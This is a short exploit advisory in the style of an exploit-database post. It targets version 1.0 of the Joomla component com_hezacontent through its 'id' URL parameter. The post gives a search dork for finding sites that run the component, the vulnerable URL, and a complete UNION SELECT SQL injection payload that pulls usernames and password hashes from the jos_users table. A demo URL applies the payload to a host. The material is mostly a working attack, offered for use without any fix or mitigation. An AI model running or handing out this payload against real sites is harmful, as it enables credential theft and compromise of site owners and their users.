Home / os / winme

Joomla Component com_hezacontent (id) SQL injection Vulnerab

Posted on 09 March 2010

================================================================= Joomla Component com_hezacontent (id) SQL injection Vulnerability ================================================================= [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://joomlacode.org/ [+] Price : free [+] Vulnerability : SQL [+] Dork : inurl:"CIHUY" ;) [+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip [+] Version : 1.0 [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER] [ XpL ] -1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- [ d3m0 ] http://site.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- dan lain sebagainya ;] # ~ - [ [ : Inj3ct0r : ] ]

 

TOP